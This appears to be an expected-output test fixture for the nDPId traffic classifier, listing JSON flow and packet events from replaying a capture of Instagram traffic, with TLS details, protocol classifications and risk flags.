00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2075,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM6bGFkcwbWEHKASbHAfPgAAAgQFeAQCCArYQyzxDXB1TAEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2076,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDNAbsBxqpPpr5nHYAQCAyEugAAAQEICg1wdVYU9Z3G"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDOAbvBtYQcmxhZHYAQCAyyKQAAAQEICg1wdVbYQyzx"}
00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1568796254536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254536,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM\/pQUID\/UzpE6ASbHCRrQAAAgQFeAQCCAoUEKcNDXB1VAEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1568796254538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254538,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDPAbv9TOkT6UFCBIAQCAwkmAAAAQEICg1wdV8UEKcN"}
00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1436720900692,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3517,"flow_avg_l4_payload_len":502,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1436720901182,"flow_last_seen":1436720908544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":788,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1436720900692,"flow_last_seen":1436720900876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3517,"flow_avg_l4_payload_len":502,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1436720901182,"flow_last_seen":1436720908544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":788,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1436720908464,"flow_last_seen":1436720911139,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1436720906017,"flow_last_seen":1436720906024,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":150,"flow_first_seen":1436720950909,"flow_last_seen":1436720952614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":143658,"flow_avg_l4_payload_len":957,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
